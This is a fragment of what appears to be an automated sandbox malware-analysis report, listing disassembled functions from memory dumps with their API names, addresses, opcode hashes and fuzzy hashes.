                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951780580.00007FFBA66A0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66AE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66C1000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CA000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1951835790.00007FFBA66CE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952036399.00007FFBA66D1000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952071427.00007FFBA66D3000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba66a0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CertEnhancedUsage$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1886896454-0
                                                                                                                                                                                                                                  • Opcode ID: 2cd6634cda7950ea608b26807c57f45d5ce5584d3dae50a6d6ae09d557c1b1f0
                                                                                                                                                                                                                                  • Instruction ID: 12b182d26149dfbe27a4c00872871188d9b7e6fa92fb7092fea8c348fc06247d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd6634cda7950ea608b26807c57f45d5ce5584d3dae50a6d6ae09d557c1b1f0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85315EE1A0BA0282FA565F7DEC141BD62B3AFA4F91F046435CE5E82790DE3DA8559B00
                                                                                                                                                                                                                                  Function 00007FF72C66013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                  • Instruction ID: e729ccd8e8d10f86d6f780a2c21e2924e2a28b74ba22fc5a9621f802ae7e9ed1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF51EB21B0924286E726B9659C0067AF5A2FF54BB4FA84638DE6D037C5CE3CE4018E64
                                                                                                                                                                                                                                  Function 00007FF72C66C134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2976181284-0
                                                                                                                                                                                                                                  • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                  • Instruction ID: 2543a96461a1dba0fe938641a66756ce545f6c037bca7570d7cb3361ced89ee7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03119072608E8281DA21AB26AC14169F763FB95BF4FA44335EA7D0B7D9CE3CD0518B10
                                                                                                                                                                                                                                  Function 00007FFBAA4949CC Relevance: 3.0, APIs: 2, Instructions: 34networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastioctlsocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1021210092-0
                                                                                                                                                                                                                                  • Opcode ID: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                                  • Instruction ID: be6f112e445ad3232d08ef4a7e15cf3c3af955819ec09858131e8f6aec477969
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d037e66daaa798c1db8349a0f9e745af233c9881e48aae1d3b5376aec23ea56
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94017161A1AA41C2E7119B76E8C406E63A8FF88BD4B504070FD5E43B35CE2DD4A68710
                                                                                                                                                                                                                                  Function 00007FFBAA4956E8 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952605640.00007FFBAA491000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFBAA490000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952566333.00007FFBAA490000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A1000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A3000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952605640.00007FFBAA4A6000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952772594.00007FFBAA4A7000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952815760.00007FFBAA4A8000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa490000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007E3440closesocket
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 511609766-0
                                                                                                                                                                                                                                  • Opcode ID: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                                  • Instruction ID: 197d3d31fe7a3e9e3e8d8a2b95363af66f79ae242505ac5c7a3b4c03d74310f8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62ca75f0746227e7f5462e3ebb3314c23d0f25c318866796c54010b4c1d505b6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF04F62A09741C2E6165F76E5C406D2328BB08BB4F1403B4EE79026E1CF3DE4668210
                                                                                                                                                                                                                                  Function 00007FF72C66AB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABC6
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00007FF72C66A9D5,?,?,00000000,00007FF72C66AA8A), ref: 00007FF72C66ABD0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 918212764-0
                                                                                                                                                                                                                                  • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                  • Instruction ID: ff124b5c4a0a30bc84c456b381c3c23e6591b99b348b6acf705da7a27a7e4cef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8021C511B0864201EA5277719C9027DF6A3FFA47B0FA8423DD92E477C2CF6CE4814B20
                                                                                                                                                                                                                                  Function 00007FFBAA4B7FF0 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3568877910-0
                                                                                                                                                                                                                                  • Opcode ID: 8908da1cc5826f1fe7d2bd08b6d6f7bc8f78f31fa746e9609a189806a6c04201
                                                                                                                                                                                                                                  • Instruction ID: bb9e0222573c691aea1bfbbb99080d66f9a64f71fc7fbc796f1224b312d411de
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8908da1cc5826f1fe7d2bd08b6d6f7bc8f78f31fa746e9609a189806a6c04201
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61515AB2A0BA42C1EB628F35E54427962A9FF04F94F144075EE4D177A8DF3CE4928360
                                                                                                                                                                                                                                  Function 00007FF72C66BEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                  • Instruction ID: 0b099c07253b9450cd99cc86397d56a4bbef62ef019b7b493efab67f8f9d6e6f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B41B732908242C7EA25AA15AD50179B3B2FFA57A0FA00139D68E436D1CF7DF442DF61
                                                                                                                                                                                                                                  Function 00007FFBAA4B81F4 Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1952893577.00007FFBAA4B1000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FFBAA4B0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952857331.00007FFBAA4B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4CB000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1952893577.00007FFBAA4D7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953017597.00007FFBAA4D8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1953052763.00007FFBAA4DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffbaa4b0000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: 00007B591
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188357925-0
                                                                                                                                                                                                                                  • Opcode ID: 873bee83d26bb22448dbf471aac8a50e4fa8fbbbc7f86af2be037ffaac8cadb3
                                                                                                                                                                                                                                  • Instruction ID: d98de50822f4f6c68758788cdb4ef13cf550c9adfdc4593f5201192fef1f7e7a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 873bee83d26bb22448dbf471aac8a50e4fa8fbbbc7f86af2be037ffaac8cadb3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E419662A0AB42C2EA568F32E44437963A8FF59B90F484571FD5D07BD4EF3DE446C610
                                                                                                                                                                                                                                  Function 00007FF72C657F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 840049012-0
                                                                                                                                                                                                                                  • Opcode ID: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                  • Instruction ID: 0d6c5bf25cbbd315964dbcc9a4990ae0d34bc11159dc6c2776a6e7451cc13498
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0748e9379ee1a24a6dd361f3a2547f707c71d81643cc4b02aa9d5a9a64da41ab
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0021E721B5865246FA52BB226D043BAE652FF59BE4FE84434EF0C07B86DE7DE441CB10
                                                                                                                                                                                                                                  Function 00007FF72C66B93C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                  • Instruction ID: b3ffcdc2ea8637889cabde6186c1adbce4fd9242ccead691b6bb038f74b24c3b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B313D22A1864285E612BB558C4137CB6A2FFA1BB4FE14239E95D077D2CE7CA4419F21
                                                                                                                                                                                                                                  Function 00007FF72C665F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                  • Instruction ID: 5b0f5432e87c91338271815ebe442a583a7df5e68f8bee1df1fb53b5ba528f3c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20118431A1C64281EA62BF11980117DF672FFA5BA4FE44439EB4C57A96CF3DE4414F60
                                                                                                                                                                                                                                  Function 00007FF72C676354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1949252738.00007FF72C651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF72C650000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949219769.00007FF72C650000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949294358.00007FF72C67B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949341055.00007FF72C691000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1949418176.00007FF72C694000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff72c650000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                                                  • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                  • Instruction ID: 5c1c71568547bf9acd071346c80e0db66393377e80d0c22d7bd9bb91f2029a27
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D210732618A4286DB22AF18D841379B3A2FBA4B70FA44638E75D476D9DF3CD415CF10
                                                                                                                                                                                                                                  Function 00007FFBA60EF070 Relevance: 1.6, APIs: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000008.00000002.1950129246.00007FFBA6091000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFBA6090000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950095632.00007FFBA6090000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6113000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA613D000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6148000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950129246.00007FFBA6153000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950432020.00007FFBA6157000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000008.00000002.1950478595.00007FFBA6159000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ffba6090000_program.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                  • Opcode ID: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                  • Instruction ID: c083d1ae33a60aedd50c8f594188eae4d7089a59f58a366a1044337c3506ab44
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8603938ac5e1fbf28ba7d9b8f40a04eb8b77d7e104ff7c3c46d49aacb8bdd123
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A21A4F2E0A79289F7769E35E88127926A2EF11F44F284435DE4C42695DF38E8E1C611
                                                                                                                                                                                                                                  Function 00007FF72C6603BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
